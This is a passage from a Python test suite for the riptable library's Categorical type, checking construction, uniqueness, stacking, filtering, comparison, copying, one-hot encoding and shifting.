assert bool(np.all(c == d))
c = Categorical({'test': np.array(['a', 'b', 'c'])})
d = Categorical(np.array(['a', 'b', 'c']))
assert bool(np.all(c == d))
def test_from_cat_as_array(self):
c = Categorical(FastArray([1, 2, 3]), _from_categorical=np.array(['a', 'b', 'c']))
assert isinstance(c.category_array, FastArray)
assert c.base_index == 1
def test_from_pandas_object(self):
pdc = pd.Categorical(['a', 'b', 'c'])
c = Categorical(pdc, unicode=True)
assert c.category_array.dtype.char == 'U'
c = Categorical(pdc, unicode=False)
assert c.category_array.dtype.char == 'S'
pdc = pd.Categorical(three_unicode)
c = Categorical(pdc)
assert c.category_array.dtype.char == 'U'
def test_empty_init(self):
with pytest.raises(ValueError):
c = Categorical({})
with pytest.raises(ValueError):
c = Categorical([])
def test_multi_with_cats(self):
with pytest.raises(NotImplementedError):
c = Categorical(
[FastArray(['a', 'b', 'c', 'a']), FastArray([1, 2, 3, 1])],
[FastArray(['a', 'b', 'c']), FastArray([1, 2, 3])],
)
# 5/9/2019 removed this warning to reduce constructor paths
# def test_unicode_warn(self):
# with self.assertWarns(UserWarning):
# c = Categorical([1,2,3],{1:'a',2:'b',3:'c'}, unicode=False)
def test_map_non_integer(self):
with pytest.raises(TypeError):
c = Categorical([1.0, 2.0, 3.0], {1: 'a', 2: 'b', 3: 'c'})
def test_category_multi_arrays(self):
with pytest.raises(TypeError):
c = Categorical([1, 2, 3], [np.arange(5), np.arange(5)])
def test_getitem_enum_list2(self):
c = Categorical([1, 1, 2, 3, 1], {'a': 1, 'b': 2, 'c': 3})
d = c[[1, 2, 3]]
assert d[0] == 'a'
def test_tuple_compare_error(self):
c = Categorical([FastArray(['a', 'b', 'c', 'a']), FastArray([1, 2, 3, 1])])
with pytest.raises(ValueError):
_ = c == ('a', 'b', 'c')
def test_filter_out_bytes_from_unicode(self):
c = Categorical(['a', 'a', 'b', 'c', 'a'], unicode=True, invalid=b'a')
assert bool(np.all(c._fa == [1, 1, 2, 3, 1]))
assert c.category_array.dtype.char == 'U'
assert 'a' in c.category_array
def test_bytes_compare_multikey(self):
c = Categorical([np.array(['a', 'b', 'c', 'a']), FastArray([1, 2, 3, 1])], unicode=True)
cols = c.category_dict
bytescol = list(cols.values())[0]
assert bytescol.dtype.char == 'U'
result = c == (b'a', 1)
assert bool(np.all(FastArray([True, False, False, True]) == result))
def test_cat_zero_wrong_base(self):
with pytest.raises(ValueError):
c = CatZero(['a', 'a', 'b', 'c', 'a'], base_index=1)
def test_preserve_name(self):
ds = TypeRegister.Dataset({'strcol': np.random.choice(['a', 'b', 'c'], 10), 'numcol': arange(10)})
c = Categorical(ds.strcol)
assert c.get_name() == 'strcol'
c = Categorical([ds.strcol, ds.numcol])
ds2 = c.sum(arange(10))
labels = ds2.label_get_names()
assert labels[0] == 'strcol'
assert labels[1] == 'numcol'
ds = TypeRegister.Dataset({'mycodes': np.random.randint(1, 4, 10)})
c = Categorical(ds.mycodes, {'a': 1, 'b': 2, 'c': 3})
assert c.get_name() == 'mycodes'
codes = np.random.randint(1, 4, 10)
cats = FastArray(['a', 'b', 'c'])
cats.set_name('test')
c = Categorical(codes, cats)
assert c.get_name() == 'test'
def test_subarray_name(self):
c = Categorical(['a', 'b'])
c1 = c[[0]]
assert c1.get_name() == c.get_name()
# Make sure there is no "quantum effect" where printing the array changes its name.
_ = str(c1)
assert c1.get_name() == c.get_name()
def test_construct_from_categorical(self):
c = Categorical(['a', 'a', 'b', 'c', 'a'])
d = Categorical(c)
assert isinstance(d.category_array, np.ndarray)
assert isinstance(d.expand_array, np.ndarray)
d2 = Categorical([c])
assert isinstance(d2.category_array, np.ndarray)
assert isinstance(d2.expand_array, np.ndarray)
def test_total_size(self):
c = Categorical(['a', 'a', 'b', 'c', 'a'])
assert c._total_size == 8
c = Categorical([arange(5, dtype=np.int32), arange(5, dtype=np.int32)])
assert c._total_size == 45
c = Categorical([arange(5, dtype=np.int64), arange(5, dtype=np.int64)])
assert c._total_size == 85
# removed while modifying groupby calculation behavior
# def test_hold_dataset(self):
# ds = TypeRegister.Dataset({'strcol':np.random.choice(['a','b','c'],30), 'numcol':arange(30)})
# c = ds.cat('strcol')
# self.assertTrue(isinstance(c._dataset, TypeRegister.Dataset))
# result = c.sum()
# self.assertTrue(isinstance(result, TypeRegister.Dataset))
# self.assertEqual(result._nrows, 3)
def test_expand_dict(self):
og_strings = FastArray(['a', 'a', 'b', 'c', 'a'])
og_nums = arange(5)
c = Categorical([og_strings, og_nums])
d = c.expand_dict
assert isinstance(d, dict)
assert len(d) == 2
dictlist = list(d.values())
assert bool(np.all(dictlist[0] == og_strings))
assert bool(np.all(dictlist[1] == og_nums))
c = Categorical([1, 2, 3], {'a': 1, 'b': 2, 'c': 3})
d = c.expand_dict
assert isinstance(d, dict)
assert len(d) == 1
dictlist = list(d.values())
assert bool(np.all(dictlist[0] == arange(1, 4)))
c = Categorical(np.random.randint(0, 10, 100_100))
with pytest.warns(UserWarning):
d = c.expand_dict
def test_expand_array(self):
c = Categorical([1, 2, 3], {'a': 1, 'b': 2, 'c': 3})
arr = c.expand_array
assert bool(np.all(arr == arange(1, 4)))
c = Categorical([FastArray(['a', 'b', 'c', 'a']), FastArray([1, 2, 3, 1])])
# expand array now works on multikey categoricals, returns a tuple of expanded arrays SJK: 4/29/2019
multi_expand = c.expand_array
assert isinstance(multi_expand, tuple)
assert len(multi_expand) == 2
assert bool(np.all(FastArray(['a', 'b', 'c', 'a']) == multi_expand[0]))
assert bool(np.all(FastArray([1, 2, 3, 1]) == multi_expand[1]))
c._fa[:] = 0
multi_expand = c.expand_array
assert bool(np.all(isnan(multi_expand[1])))
assert bool(np.all(multi_expand[0] == b'Filtered'))
def test_true_false_spacer(self):
c = Categorical(['a', 'b', 'c'])
t_true = c._tf_spacer(['test', True])
assert t_true == 'testTrue '
t_false = c._tf_spacer(['test', False])
assert t_false == 'testFalse'
def test_mapping_hstack(self):
c1 = Categorical([1, 1, 1, 1, 2, 3], {'a': 1, 'b': 2, 'c': 3})
c2 = Categorical([1, 1, 1, 1, 3, 4], {'a': 1, 'c': 3, 'd': 4})
stacked = Categorical.hstack([c1, c2])
assert stacked.unique_count == 4
assert stacked.from_category('b') == 2
assert stacked.from_category('d') == 4
assert len(stacked) == 12
c1 = Categorical([1, 1, 1, 1, 2, 3], {'a': 1, 'b': 2, 'd': 3})
c2 = Categorical([1, 1, 1, 1, 3, 4], {'a': 1, 'c': 3, 'd': 4})
# removed, hstack now relies on unique codes only SJK: 3/5/2019
# with self.assertRaises(TypeError):
# c3 = Categorical.hstack([c1, c2])
def test_matlab_nan(self):
dts = [np.int8, np.int16, np.int32, np.int64]
matlab_float_idx = FastArray([1.0, 0.0, np.nan])
matlab_cats = ['a', 'b']
for dt in dts:
c = Categorical(matlab_float_idx, matlab_cats, dtype=dt, from_matlab=True)
assert bool(np.all(c._fa == [1, 0, 0])), f'failed to flip nan to zero for dtype {dt}'
assert np.dtype(dt) == c.dtype
def test_from_provided_with_filter(self):
# not found and filter
c = Categorical(
['a', 'a', 'b', 'c', 'd'],
['a', 'b', 'c'],
filter=FastArray([False, False, True, True, False]),
invalid='INVALID',
)
c.filtered_set_name('INVALID')
correct = FastArray([b'INVALID', b'INVALID', b'b', b'c', b'INVALID'])
assert bool(np.all(c.expand_array == correct))
# filter only (uses default invalid)
c = Categorical(['a', 'a', 'b', 'c'], ['a', 'b', 'c'], filter=FastArray([False, False, True, True]),)
f = c.filtered_name
correct = FastArray([f, f, b'b', b'c'])
assert bool(np.all(c.expand_array == correct))
# even though filtered out, categories still untouched
correct = FastArray([b'a', b'b', b'c'])
assert bool(np.all(c.category_array == correct))
# filtering not allowed for base index 0
with pytest.raises(ValueError):
c = Categorical(
['a', 'a', 'b', 'c'], ['a', 'b', 'c'], filter=FastArray([False, False, True, True]), base_index=0,
)
def test_numeric_invalid(self):
# 5/16/2019 invalid category must be in provided uniques
c = Categorical([1.0, 1.0, 2.0], [1.0, 2.0], invalid=2.0)
assert c._fa[2] == 2
num = c.sum(arange(1, 4)).col_0[0]
assert num == 3
def test_get_groupings(self):
g, f, n = (
FastArray([2, 3, 0, 4, 1]),
FastArray([0, 0, 2, 4]),
FastArray([0, 2, 2, 1]),
)
c = Categorical(['b', 'c', 'a', 'a', 'b'], base_index=0)
gg = c.get_groupings()
group = gg['iGroup']
first = gg['iFirstGroup']
ncount = gg['nCountGroup']
assert bool(np.all(g == group))
assert bool(np.all(f == first))
assert bool(np.all(n == ncount))
c = Categorical(['b', 'c', 'a', 'a', 'b'], base_index=1)
gg = c.get_groupings()
group = gg['iGroup']
first = gg['iFirstGroup']
ncount = gg['nCountGroup']
assert bool(np.all(g == group))
assert bool(np.all(f == first))
assert bool(np.all(n == ncount))
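# A descriptive note on the layout asserted above (inferred from the expected arrays
# g, f, n in this test): iGroup lists row indices ordered by category, iFirstGroup gives
# each group's starting offset into iGroup (with a leading slot for the Filtered bin),
# and nCountGroup gives each group's size. For ['b','c','a','a','b'] the 'a' rows are
# [2, 3], the 'b' rows [0, 4], and the 'c' row [1], which yields g, f, n above.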
def test_repr(self):
# just make sure no error for coverage
c = Categorical(['a', 'b', 'c'])
r = c.__repr__()
assert r, f"Representation should not be empty for Categorical '{c}'."
assert isinstance(r, str)
def test_copy_deep(self):
c = Categorical(['a', 'b', 'c'])
d = c.copy(deep=True)
d[0] = 'b'
assert c[0] == 'a'
assert c._fa[0] == 1
assert d[0] == 'b'
assert d._fa[0] == 2
def test_copy_new_filter(self):
a = Categorical('A B A B A B'.split())
b = Categorical('B A B A B A'.split())
c = a.copy()
f = c == 'A'
c[f] = b[f]
assert c[0] == 'B'
assert c[1] == 'B'
assert a[0] == 'A'
assert a[1] == 'B'
assert b[0] == 'B'
assert b[1] == 'A'
def test_setitem_tuple(self):
c = Categorical([arange(5), arange(5)])
c[0] = (1, 1)
assert c._fa[0] == 2
def test_nunique(self):
codes = np.random.randint(0, 3, 1000)
d = {0: 'All', 1: 'ManualAndQuasi', 2: 'Manual'}
c = Categorical(codes, d)
n = c.nunique()
assert n == 3
assert len(c.unique()) == 3
codes = np.ones(1000, dtype=np.int32)
c = Categorical(codes, d)
n = c.nunique()
assert n == 1
assert len(c.unique()) == 1
codes = arange(5)
c = Categorical(codes, d)
n = c.nunique()
assert n == 5
assert len(c.unique()) == 5
c = Categorical(['a', 'a', 'b', 'c', 'd'], ['a', 'b', 'c', 'd'])
n = c.nunique()
assert n == 4
assert len(c.unique()) == 4
c = Categorical(['a', 'a', 'b', 'c', 'd'], ['a', 'b', 'c', 'd'], base_index=0)
n = c.nunique()
assert n == 4
assert len(c.unique()) == 4
c = Categorical(['a', 'a', 'b', 'c', 'd'])
c[2] = 0
n = c.nunique()
assert n == 3
assert len(c.unique()) == 3
assert c.unique_count == 4
c = Categorical([arange(3), np.array(['a', 'b', 'c'])])
c[0] = 0
n = c.nunique()
assert n == 2
assert c.unique_count == 3
# The following assertion is moved to its own pytest unit test, marked xfail,
# found below and named test_multikey_categorical_unique.
# assert len(c.unique()) == 2
def test_unique(self):
l = list('xyyz')
c, c_sub = rt.Cat(l), rt.Cat(l[:3])
assert_array_equal(c.unique(), c.category_array, 'mismatch between unique categories and category array')
assert_array_equal(c.unique(), c.category_array.unique(), 'mismatch between unique categories and expanded category array')
assert c.nunique() == 3, 'mismatch in number of unique categories'
assert_array_equal(c[:3].unique(), c_sub.category_array, 'mismatch between unique categories and category array with sliced categorical')
assert_array_equal(c[:3].unique(), c_sub.category_array.unique(), 'mismatch between unique categories and expanded category array with sliced categorical')
assert c[:3].nunique() == 2, 'mismatch in number of unique categories with sliced categorical'
def test_scalar_unique(self):
idx = ones(100)
cats = 700_000.0
c = Categorical(idx, cats, from_matlab=True)
assert isinstance(c, Categorical)
assert c.unique_count == 1
def test_stack_multikey(self):
# TODO pytest parameterize the strings
strs = FA(np.random.choice(['aaaaa', 'b', 'ccc'], 23))
flts = np.random.choice([7.14, 6.66, 5.03], 23)
c1 = Categorical([strs, flts])
c1_str = Categorical(strs)
c1_flt = Categorical(flts)
strs2 = FA(np.random.choice(['b', 'aaaaa'], 17))
flts2 = np.random.choice([5.03, 7.14], 17)
c2 = Categorical([strs2, flts2])
c2_str = Categorical(strs2)
c2_flt = Categorical(flts2)
fa_str = hstack([strs, strs2])
fa_flt = hstack([flts, flts2])
# TODO add assertions for multikey Categoricals
c_str = Categorical(fa_str)
c_flt = Categorical(fa_flt)
# TODO move these into SDS save / load tests
paths = [r'riptable/tests/temp/ds1.sds', r'riptable/tests/temp/ds2.sds']
ds1 = Dataset(
{
'mkcat': c1,
'strcat': c1_str,
'fltcat': c1_flt,
'strfa': strs,
'fltfa': flts,
}
)
ds2 = Dataset(
{
'mkcat': c2,
'strcat': c2_str,
'fltcat': c2_flt,
'strfa': strs2,
'fltfa': flts2,
}
)
ds1.save(paths[0])
ds2.save(paths[1])
# normal dataset hstack
hstack_ds = hstack([ds1, ds2])
assert isinstance(hstack_ds, Dataset)
# dataset hstack from load
stack_load_ds = load_sds(paths, stack=True)
assert isinstance(stack_load_ds, PDataset)
# multikey cat hstack
hstack_mkcats = hstack([c1, c2])
assert isinstance(hstack_mkcats, Categorical)
# normal array hstack
hstack_strs = hstack([strs, strs2])
hstack_flts = hstack([flts, flts2])
# single cat hstack
hstack_cstrs = hstack([c1_str, c2_str])
assert isinstance(hstack_cstrs, Categorical)
hstack_cflts = hstack([c1_flt, c2_flt])
assert isinstance(hstack_cflts, Categorical)
assert bool(np.all(hstack_strs == hstack_cstrs.expand_array))
assert bool(np.all(hstack_flts == hstack_cflts.expand_array))
mktup = [*hstack_mkcats.category_dict.values()]
assert bool(np.all(hstack_mkcats._expand_array(mktup[0]) == fa_str))
assert bool(np.all(hstack_mkcats._expand_array(mktup[1]) == fa_flt))
mktup2 = [*stack_load_ds.mkcat.category_dict.values()]
assert bool(np.all(stack_load_ds.mkcat._expand_array(mktup2[0]) == fa_str))
assert bool(np.all(stack_load_ds.mkcat._expand_array(mktup2[1]) == fa_flt))
mktup3 = [*hstack_ds.mkcat.category_dict.values()]
assert bool(np.all(hstack_ds.mkcat._expand_array(mktup3[0]) == fa_str))
assert bool(np.all(hstack_ds.mkcat._expand_array(mktup3[1]) == fa_flt))
for p in paths:
os.remove(p)
# TO TEST:
# regular python Enum
# apply / apply_dataset, etc.
# def test_sort_copy(self):
# c = Categorical(np.random.choice(['a','b','c'], 15))
# d = c.sort_copy()
# c = Categorical([np.random.choice(['a','b','c'], 15), np.random.randint(0,3,15)])
# d = c.sort_copy()
# ----------------------------------------------------------
# def test_str_repr(self):
# '''
# SJK: We're still in the early stages of deciding how to print out or summarize a categorical in the workspace.
# Comment it out if repr or str changes, and I will fix up.
# '''
# # no break
# input = ['b', 'b', 'b', 'a', 'b', 'b']
# str_string = ', '.join(input)
# repr_string = "Categorical(["+str_string+"])"
# c = Categorical(input)
# self.assertEqual(str(c),str_string, msg=f"__str__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
# self.assertEqual(c.__repr__(),repr_string, msg=f"__repr__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
# # add break
# slice_size = 5
# input = ['b', 'b', 'b', 'a', 'b', 'b', 'b', 'b', 'b', 'a', 'b', 'b', 'c', 'c']
# str_string = ', '.join(input[:slice_size]+['...']+input[-slice_size:])
# repr_string = "Categorical(["+str_string+"])"
# c = Categorical(input)
# self.assertEqual(str(c),str_string, msg=f"__str__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
# self.assertEqual(c.__repr__(),repr_string, msg=f"__repr__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
def test_as_string_array(self):
# SJK 10/4/2018 - as string array now returns bytes OR unicode (whatever type the string based categorical is holding)
f = np.array([b'b', b'b', b'b', b'a', b'b', b'b'])
c = Categorical(f)
is_equal = bool(np.all(c.as_string_array == f))
assert isinstance(c.as_string_array, FastArray), f"Categorical did not return a fastarray in as_string_array"
assert (
is_equal
), f"Categorical returned an incorrect string array {c.as_string_array} view of itself. Expected {f}"
def test_indexing_numeric(self):
c = Cat([1.1, 2.2, 3.3])
result = c['2.2']
assert np.all(result == [False, True, False])
def test_fill_forward(self):
fa = FA([1., np.nan, 1.])
c = Cat([1,1,1])
c.fill_forward(fa, inplace=True)
assert np.all(fa == [1., 1., 1.])
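# A descriptive note on the single case above: fill_forward propagates the last valid
# value forward within each category bucket; since every row here belongs to category 1,
# the NaN at position 1 is filled in place from the value at position 0.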
# TODO pytest parameterize `compare_func_names`
def test_all_compare_tests(self):
# with scalar
# cat(unicode)
i = 2
c1 = Categorical(three_ints)
if ShowCompareInfo:
print("Categorical:", c1)
if ShowCompareInfo:
print("Compare unicode to int scalar: 2")
self.compare_cat_test(c1, compare_func_names, int_success, i)
# cat(unicode) / unicode, unicode list
i = "AMZN\u2082"
c3 = Categorical(three_unicode)
if ShowCompareInfo:
print("Categorical:", c3)
if ShowCompareInfo:
print("Compare unicode cat to unicode string")
self.compare_cat_test(c3, compare_func_names, int_success, i)
if ShowCompareInfo:
print("Compare to list of unicode string")
self.compare_cat_test(c3, compare_func_names, int_success, [i])
if ShowCompareInfo:
print("Compare to a numpy array of unicode string")
self.compare_cat_test(c3, compare_func_names, int_success, np.array([i]))
# cat(bytes) / bytes, bytes list
i = b'b'
c4 = Categorical(three_bytes)
if ShowCompareInfo:
print("Categorical:", c4)
if ShowCompareInfo:
print("Compare bytes cat to bytestring")
self.compare_cat_test(c4, compare_func_names, int_success, i)
if ShowCompareInfo:
print("Compare to bytestring in list")
self.compare_cat_test(c4, compare_func_names, int_success, [i])
if ShowCompareInfo:
print("Compare to bytestring in numpy array")
self.compare_cat_test(c4, compare_func_names, int_success, np.array([i]))
# cat(bytes) / unicode, unicode list
i = "b"
c5 = Categorical(three_bytes)
if ShowCompareInfo:
print("Categorical:", c5)
if ShowCompareInfo:
print("Compare bytes cat to unicode string")
self.compare_cat_test(c5, compare_func_names, int_success, i)
if ShowCompareInfo:
print("Compare to unicode string in list")
self.compare_cat_test(c5, compare_func_names, int_success, [i])
if ShowCompareInfo:
print("Compare to unicode string in numpy array")
self.compare_cat_test(c5, compare_func_names, int_success, np.array([i]))
# equal categoricals (same dictionary)
# cat(bytes) / cat(bytes)
if ShowCompareInfo:
print("Compare two equal categoricals:")
if ShowCompareInfo:
print("Both from byte lists:")
c1 = Categorical(three_bytes)
c2 = Categorical(three_bytes)
if ShowCompareInfo:
print("cat1:", c1)
if ShowCompareInfo:
print("cat2:", c2)
self.compare_cat_test(c1, compare_func_names, same_success, c2)
# cat(unicode) / cat(unicode)
if ShowCompareInfo:
print("Both from unicode lists:")
c1 = Categorical(three_unicode)
c2 = Categorical(three_unicode)
if ShowCompareInfo:
print("cat1:", c1)
if ShowCompareInfo:
print("cat2:", c2)
self.compare_cat_test(c1, compare_func_names, same_success, c2)
# cat(unicode) / cat(bytes)
if ShowCompareInfo:
print("unicode/bytes list")
c1 = Categorical(["a", "b", "c"])
c2 = Categorical(three_bytes)
if ShowCompareInfo:
print("cat1:", c1)
if ShowCompareInfo:
print("cat2:", c2)
self.compare_cat_test(c1, compare_func_names, same_success, c2)
# unequal categoricals (same dictionary)
# cat(bytes) / cat(bytes)
if ShowCompareInfo:
print("Compare two unequal categoricals (same dict):")
if ShowCompareInfo:
print("both bytes")
c1 = Categorical([0, 1, 0], three_bytes)
c2 = Categorical([2, 1, 2], three_bytes)
if ShowCompareInfo:
print("cat1:", c1)
if ShowCompareInfo:
print("cat2:", c2)
self.compare_cat_test(c1, compare_func_names, diff_success, c2)
# cat(unicode) / cat(unicode)
if ShowCompareInfo:
print("both unicode")
c1 = Categorical([0, 1, 0], three_unicode)
c2 = Categorical([2, 1, 2], three_unicode)
if ShowCompareInfo:
print("cat1:", c1)
if ShowCompareInfo:
print("cat2:", c2)
self.compare_cat_test(c1, compare_func_names, diff_success, c2)
## cat(bytes) / int list (matching)
# if ShowCompareInfo: print("Compare categorical to matching int list")
# if ShowCompareInfo: print("bytes")
# i = [1,2,3]
# c1 = Categorical(three_bytes)
# self.compare_cat_test(c1,compare_func_names,same_success,i)
## cat(unicode) / int list (matching)
# if ShowCompareInfo: print("unicode")
# c1 = Categorical(three_unicode)
# self.compare_cat_test(c1,compare_func_names,same_success,i)
## cat(bytes) / int list (non-matching)
# if ShowCompareInfo: print("Compare categorical to non-matching int list")
# if ShowCompareInfo: print("bytes")
# i = [3,2,1]
# c1 = Categorical(three_bytes)
# self.compare_cat_test(c1,compare_func_names,int_success,i)
## cat(unicode) / int list(non-matching)
# if ShowCompareInfo: print("unicode")
# c1 = Categorical(three_unicode)
# self.compare_cat_test(c1,compare_func_names,int_success,i)
# def cat_slicing(self):
# three_unicode =FA(["AAPL\u2080","AMZN\u2082","IBM\u2081"])
# three_bytes = FA([b'a',b'b',b'c'])
# num_rows=8
# idx_size=15
# get_item_dicts = {
# "single_slices" : {
# ":2" : slice(None,2,None),
# "-2:": slice(-2,None,None),
# "2:5": slice(2,5,None),
# "5:" : slice(5,None,None),
# ":" : slice(None,None,None)
# },
# "bool_arrays" : {
# "python_bool" : [True, False, True, False, False, True, True, True, False, True, False, False, True, False, True],
# "numpy_bool" : np.array([True, False, True, False, False, True, True, True, False, True, False, False, True, False, True])
# },
# "int_indices" : { "int_idx_size"+str(idx_size) : np.random.randint(low=0,high=num_rows,size=idx_size) for idx_size in range(1,num_rows) }
# }
# failures = 0
# idx_list = np.random.randint(low=0,high=8,size=15)
# s_list = np.array([b'adam',b'bob',b'charlie',b'david',b'edward',b'frank',b'greg',b'harold'])
# c = Categorical(idx_list, s_list)
# for key, test_dict in get_item_dicts.items():
# print("\n\n"+key)
# for call_str, val in test_dict.items():
# success = s_list[idx_list[val]]
# if np.all(c[val].as_string_array == success):
# message = "success"
# else:
# message = "failure"
# failures += 1
# print(call_str, message)
# print("Tests complete with",failures,"errors")
# return c
@pytest.mark.xfail(
reason="RIP-215 - leads to inconsistent Categorical state; please add hypothesis tests when resolved."
)
def test_category_add(self):
cat = Categorical(list("bbcdebc"))
e = "a"
cat.category_add(e)
assert e in cat, "expect the added category to be added to the Categorical"
assert e in cat._categories, "expect the added category to be added to the Categorical._categories"
assert e in cat.category_array, "expect the added category to be added to the Categorical.category_array"
assert e in cat.category_dict, "expect the added category to be added to the Categorical.category_dict"
@pytest.mark.xfail(
reason="RIP-215 - leads to inconsistent Categorical state; please add hypothesis tests when resolved."
)
def test_category_remove(self):
cat = Categorical(list("bbcdebc"))
e = cat[0]
cat.category_remove(e)
assert e not in cat, "expect the removed category to be removed from the Categorical"
assert e not in cat._categories, "expect the removed category to be removed from the Categorical._categories"
assert (
e not in cat.category_array
), "expect the removed category to be removed from the Categorical.category_array"
assert (
e not in cat.category_dict
), "expect the removed category to be removed from the Categorical.category_dict"
# TODO move this to testing utils
def compare_cat_test(self, cat, compare_func_names, success_bools, i):
for fname, success in zip(compare_func_names, success_bools):
func = getattr(cat, fname)
result = func(i)
assert np.all(result == success), f'fail on {fname} {cat} {i}'
if ShowCompareInfo:
if np.all(result == success):
message = "succeeded"
else:
message = "failed"
print(fname, message)
def test_duplicated(self):
result = Cat([2, 3, 2], list('qwery')).duplicated()
assert np.all(result == FA([False, False, True]))
def test_cat_copy(self):
# add deep copy for enum, single, multi
x = arange(6, dtype=uint16) // 2
c = Cat(x, {0: 'Run', 1: 'Stop', 2: 'Start'}, dtype=uint16)
c[1] = 'Start'
a = c.copy()
d = a[:5]
a[1] = 'Run'
b = a[:5]
assert a._fa[1] == 0
assert b._fa[1] == 0
assert c._fa[1] == 2
assert d._fa[1] == 0
def test_assinglekey(self):
c = Cat([1, 2, 1, 2, 1, 2], {'Sunny': 1, 'Thunderstorms': 2})
# insert bad value
c._fa[3] = 17
c1 = c.as_singlekey(ordered=False)
c2 = c.as_singlekey(ordered=True)
assert np.all(c1.expand_array == c2.expand_array)
c = Cat([-1, -2, -1, -2, -1, -2], {'Sunny': -1, 'Thunderstorms': -2})
c._fa[3] = 17
c3 = c.as_singlekey(ordered=False)
c2 = c.as_singlekey(ordered=True)
assert np.all(c1.expand_array == c2.expand_array)
assert np.all(c3.expand_array == c2.expand_array)
# Cannot use the pytest.mark.parametrize decorator within classes that inherit from unittest.TestCase.
# Will need to migrate from unittest to pytest and fold the following categorical tests into Categorical_Test.
@pytest.mark.parametrize(
"categoricals",
[
# Categorical constructed from python list data
pytest.param(
[
Categorical(data)
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
],
id="cat_with_list_values",
),
# Categorical constructed from numpy array
pytest.param(
[
Categorical(np.array(data))
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
],
id="cat_with_np_array_values",
),
# Categorical constructed from riptable fast array
pytest.param(
[
Categorical(rt.FastArray(data))
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
],
id="cat_with_rt_fastarray_values",
),
# failed test cases
pytest.param(
[Categorical(data) for data in get_categorical_data_factory_method(CategoryMode.MultiKey)],
marks=[
pytest.mark.xfail(
reason="RIP-410 - Bug for MultiKey Categoricals: AttributeError: 'Categorical' object has no attribute 'ismultikey_labels'"
)
],
id="cat_with_tuple_values",
),
],
)
def test_one_hot_encode(categoricals):
for categorical in categoricals:
col_names, encoded_arrays = categorical.one_hot_encode()
category_array = categorical.category_array.astype('U')
# Test 1.1 The col_names are the same as the category array.
assert not set(category_array).symmetric_difference(set(col_names)), (
f"The column names should be the same as the names in the category array: "
f"category array {category_array}; column names {col_names}"
)
# Test 1.2 The encoded_arrays dtypes are consistent with one another.
encoded_arrays_dtypes = set([fa.dtype for fa in encoded_arrays])
assert (
len(encoded_arrays_dtypes) == 1
), f"Encoded array dtypes should be consistent, got {encoded_arrays_dtypes}"
# todo for each category, assert the mask of the categorical is in the encoded_arrays
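# A hedged sketch of the API exercised above; the return order (column names, then one
# array per category) follows the assertions in this test, and the example values are
# hypothetical rather than documented behavior:
#   c = Categorical(['a', 'b', 'a'])
#   names, cols = c.one_hot_encode()   # names ~ ['a', 'b']; cols ~ ([1, 0, 1], [0, 1, 0])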
@pytest.mark.parametrize(
"categoricals",
[
# Categorical constructed from python list data
pytest.param(
[Categorical(data) for data in get_categorical_data_factory_method([CategoryMode.StringArray])],
id="cat_with_list_values",
),
# Categorical constructed from numpy array
pytest.param(
[Categorical(np.array(data)) for data in get_categorical_data_factory_method([CategoryMode.StringArray])],
id="cat_with_np_array_values",
),
# Categorical constructed from riptable fast array
pytest.param(
[
Categorical(rt.FastArray(data))
for data in get_categorical_data_factory_method([CategoryMode.StringArray])
],
id="cat_with_rt_fastarray_values",
),
],
)
def test_shift_cat(categoricals):
# todo Handle numeric invalid types for categoricals with values other than strings.
filtered_name = rt.rt_enum.FILTERED_LONG_NAME.encode("utf-8")
for categorical in categoricals:
cat_len = len(categorical)
for i in range(-cat_len + 1, cat_len): # exhaustive shift of all Categorical values.
# shift the categorical i-places
shift_cat = categorical.shift_cat(i)
# The category array should remain unchanged.
assert_array_equal(shift_cat.category_array, categorical.category_array)
# The underlying FastArray should have the items shifted to the i-th position.
if i > 0: # shift forwards case
assert_array_equal(
shift_cat._fa[i:], categorical._fa[:-i], f"FastArray items should be shifted by {i} positions.",
)
# The Categorical should have the values shifted to the i-th position.
cat_values, shift_cat_values = (
categorical.expand_array,
shift_cat.expand_array,
)
assert_array_equal(
shift_cat_values[i:], cat_values[:-i], f"Categorical values should be shifted by {i} positions.",
)
# The underlying FastArray should have the first i-items to be the invalid value.
# The Categorical values should have the first i-items be the filtered or invalid name.
# Need to handle other invalid values and other Categorical base indexing.
assert_array_equal(
shift_cat_values[:i],
np.full(i, filtered_name),
f"Shifted Categorical values up to {i}-th position should be '{filtered_name}'.",
)
assert_array_equal(
shift_cat._fa[:i],
np.zeros(i),
f"Shifted Categorical underlying FastArray items up to {i}-th position should be the invalid value 0.",
)
elif i < 0: # shifted backwards case
i = abs(i) # slicing arithmetic based on positional value of i
assert_array_equal(
shift_cat._fa[: cat_len - i],
categorical._fa[i:],
f"FastArray items should be shifted by -{i} positions.",
)
cat_values, shift_cat_values = (
categorical.expand_array,
shift_cat.expand_array,
)
assert_array_equal(
shift_cat_values[: cat_len - i],
cat_values[i:],
f"Categorical values should be shifted by -{i} positions.",
)
assert_array_equal(
shift_cat_values[-i:],
np.full(i, filtered_name),
f"Shifted Categorical values up to -{i}-th position should be '{filtered_name}'.",
)
assert_array_equal(
shift_cat._fa[-i:],
np.zeros(i),
f"Shifted Categorical underlying FastArray items up to -{i}-th position should be the invalid value 0.",
)
elif i == 0: # zero-th shift case
# test for equality
assert_array_equal(shift_cat.category_array, categorical.category_array)
assert_array_equal(shift_cat._fa, categorical._fa)
cat_values, shift_cat_values = (
categorical.expand_array,
shift_cat.expand_array,
)
assert_array_equal(shift_cat_values, cat_values)
# shift overflow for backward and forward case up to two values
for i in list(range(-cat_len - 2, -cat_len)) + list(range(cat_len, cat_len + 2)):
shift_cat = categorical.shift_cat(i)
assert_array_equal(shift_cat.category_array, categorical.category_array)
# Investigate possible bug with expanding Categorical values. E.g.:
# given:
# Categorical([a, a, a, a, a, a, a, a, a, a]) Length: 10
# FastArray([1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int8) Base Index: 1
# FastArray([b'a'], dtype='|S1') Unique count: 1
# shifted categorical
# Categorical([Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered]) Length: 10
# FastArray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int8) Base Index: 1
# FastArray([b'a'], dtype='|S1') Unique count: 1
# got
# E x: FastArray([b'Filtered', b'Filtered', b'Filtered', b'Filtered',
